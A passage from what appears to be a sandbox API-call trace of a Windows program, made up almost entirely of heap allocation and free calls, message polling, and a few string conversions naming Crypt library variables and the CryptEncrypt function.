hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0123.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.663] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0123.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0123.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.664] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.664] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0123.664] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0123.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0123.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0123.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0123.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0123.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0123.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0123.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0123.667] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.667] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0123.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0123.667] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0123.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0123.668] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0123.668] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0123.668] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0123.668] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0123.668] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0123.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0123.669] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0123.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0123.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd6ba) returned 0x49d2468 [0123.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0123.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cac10 [0123.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 